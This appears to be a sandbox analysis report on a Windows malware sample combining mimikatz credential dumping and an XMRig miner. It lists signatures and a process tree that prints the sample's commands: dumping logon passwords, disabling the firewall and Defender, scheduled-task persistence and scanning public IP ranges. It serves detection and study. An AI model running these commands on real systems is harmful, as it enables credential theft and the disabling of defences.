Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2024-12-28...tz.exe

windows7-x64

10

2024-12-28...tz.exe

windows10-2004-x64

Analysis

  • max time kernel
    110s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/12/2024, 00:47

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    2024-12-28_7b10f2277167220830c83305dd874683_hacktools_icedid_mimikatz.exe

  • Size

    6.9MB

  • MD5

    7b10f2277167220830c83305dd874683

  • SHA1

    f5c98fc90cbf6ac2b5d9ffe2348e8ec0b1ce238e

  • SHA256

    ca2e3244daf1dfbf881d9494252be413d4a0f4022089ffa8ca716f6edd798c24

  • SHA512

    e25145b07fa8295b1548c118e70cd8f805d4f448236925283fde43eb367e6d394a16aa32bca1f53bb19b9dd79fbda8c7731073276281a14e68acaeefeb11d57c

  • SSDEEP

    196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Mimikatz family
    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Contacts a large (11038) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 9 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 3 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2104
      • C:\Windows\TEMP\ltbmbiubv\ttittb.exe
        "C:\Windows\TEMP\ltbmbiubv\ttittb.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3108
    • C:\Users\Admin\AppData\Local\Temp\2024-12-28_7b10f2277167220830c83305dd874683_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-12-28_7b10f2277167220830c83305dd874683_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tmbllbvl\ibebikp.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2344
        • C:\Windows\tmbllbvl\ibebikp.exe
          C:\Windows\tmbllbvl\ibebikp.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4712
    • C:\Windows\tmbllbvl\ibebikp.exe
      C:\Windows\tmbllbvl\ibebikp.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3556
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1796
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:4220
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:3836
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
              3⤵
                PID:4840
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2376
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2612
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:2960
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:1228
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3472
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe /S
              2⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:8
              • C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe
                C:\Windows\buzcwvvny\mmzbiruiz\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3296
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2556
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                      PID:4860
                  • C:\Windows\SysWOW64\net.exe
                    net stop "TrueSight Meter"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2380
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop "TrueSight Meter"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3976
                  • C:\Windows\SysWOW64\net.exe
                    net stop npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3124
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:3276
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    4⤵
                      PID:4820
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:4872
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1168
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4888
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:1544
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2404
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:912
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                        PID:1600
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\buzcwvvny\mmzbiruiz\Scant.txt
                    2⤵
                      PID:4308
                      • C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe
                        C:\Windows\buzcwvvny\mmzbiruiz\tpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\buzcwvvny\mmzbiruiz\Scant.txt
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:4932
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\buzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\buzcwvvny\Corporate\log.txt
                      2⤵
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:4796
                      • C:\Windows\buzcwvvny\Corporate\vfshost.exe
                        C:\Windows\buzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3032
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\ibebikp.exe"
                      2⤵
                        PID:2376
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2316
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\ibebikp.exe"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:4004
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2440
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3272
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "fklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1280
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2612
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4256
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "jbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F"
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3620
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4720
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3264
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:692
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1424
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3148
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:216
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1124
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:1000
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1924
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3500
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:384
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:324
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop SharedAccess
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:1352
                        • C:\Windows\SysWOW64\net.exe
                          net stop SharedAccess
                          3⤵
                            PID:5000
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop SharedAccess
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4092
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh firewall set opmode mode=disable
                          2⤵
                            PID:1868
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh firewall set opmode mode=disable
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:3900
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c netsh Advfirewall set allprofiles state off
                            2⤵
                              PID:2732
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh Advfirewall set allprofiles state off
                                3⤵
                                • Modifies Windows Firewall
                                • Event Triggered Execution: Netsh Helper DLL
                                • System Location Discovery: System Language Discovery
                                PID:3284
                            • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                              C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 776 C:\Windows\TEMP\buzcwvvny\776.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3568
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop MpsSvc
                              2⤵
                                PID:2344
                                • C:\Windows\SysWOW64\net.exe
                                  net stop MpsSvc
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1700
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop MpsSvc
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1280
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c net stop WinDefend
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:3928
                                • C:\Windows\SysWOW64\net.exe
                                  net stop WinDefend
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3348
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop WinDefend
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3272
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c net stop wuauserv
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:1968
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  3⤵
                                    PID:4492
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3032
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config MpsSvc start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5080
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config MpsSvc start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:2376
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config SharedAccess start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4396
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config SharedAccess start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:3188
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config WinDefend start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:532
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WinDefend start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:3672
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config wuauserv start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:968
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config wuauserv start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:2988
                                • C:\Windows\TEMP\xohudmc.exe
                                  C:\Windows\TEMP\xohudmc.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4180
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 60 C:\Windows\TEMP\buzcwvvny\60.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2248
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2104 C:\Windows\TEMP\buzcwvvny\2104.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4228
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2644 C:\Windows\TEMP\buzcwvvny\2644.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2068
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2784 C:\Windows\TEMP\buzcwvvny\2784.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5052
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 2836 C:\Windows\TEMP\buzcwvvny\2836.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3964
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3080 C:\Windows\TEMP\buzcwvvny\3080.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4348
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3824 C:\Windows\TEMP\buzcwvvny\3824.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2628
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3916 C:\Windows\TEMP\buzcwvvny\3916.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4324
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3984 C:\Windows\TEMP\buzcwvvny\3984.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2392
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4076 C:\Windows\TEMP\buzcwvvny\4076.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1796
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4196 C:\Windows\TEMP\buzcwvvny\4196.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3452
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 1596 C:\Windows\TEMP\buzcwvvny\1596.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4088
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3832 C:\Windows\TEMP\buzcwvvny\3832.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5016
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4380 C:\Windows\TEMP\buzcwvvny\4380.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3376
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4480 C:\Windows\TEMP\buzcwvvny\4480.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:8
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 3476 C:\Windows\TEMP\buzcwvvny\3476.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1044
                                • C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe
                                  C:\Windows\TEMP\buzcwvvny\vmgumyclb.exe -accepteula -mp 4908 C:\Windows\TEMP\buzcwvvny\4908.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3296
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c C:\Windows\buzcwvvny\mmzbiruiz\scan.bat
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4312
                                  • C:\Windows\buzcwvvny\mmzbiruiz\lubvuzbtm.exe
                                    lubvuzbtm.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                    3⤵
                                    • Executes dropped EXE
                                    • Drops file in Windows directory
                                    • System Location Discovery: System Language Discovery
                                    PID:800
                              • C:\Windows\SysWOW64\cusoqc.exe
                                C:\Windows\SysWOW64\cusoqc.exe
                                1⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of SetWindowsHookEx
                                PID:2924
                              • C:\Windows\system32\cmd.EXE
                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
                                1⤵
                                  PID:3992
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    2⤵
                                      PID:1612
                                    • C:\Windows\system32\cacls.exe
                                      cacls C:\Windows\tmbllbvl\ibebikp.exe /p everyone:F
                                      2⤵
                                        PID:4416
                                    • C:\Windows\system32\cmd.EXE
                                      C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
                                      1⤵
                                        PID:1968
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          2⤵
                                            PID:1468
                                          • C:\Windows\system32\cacls.exe
                                            cacls C:\Windows\TEMP\ltbmbiubv\ttittb.exe /p everyone:F
                                            2⤵
                                              PID:4408
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ibebikp.exe
                                            1⤵
                                              PID:4980
                                              • C:\Windows\ime\ibebikp.exe
                                                C:\Windows\ime\ibebikp.exe
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2556

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Reconnaissance

                                            Resource Development

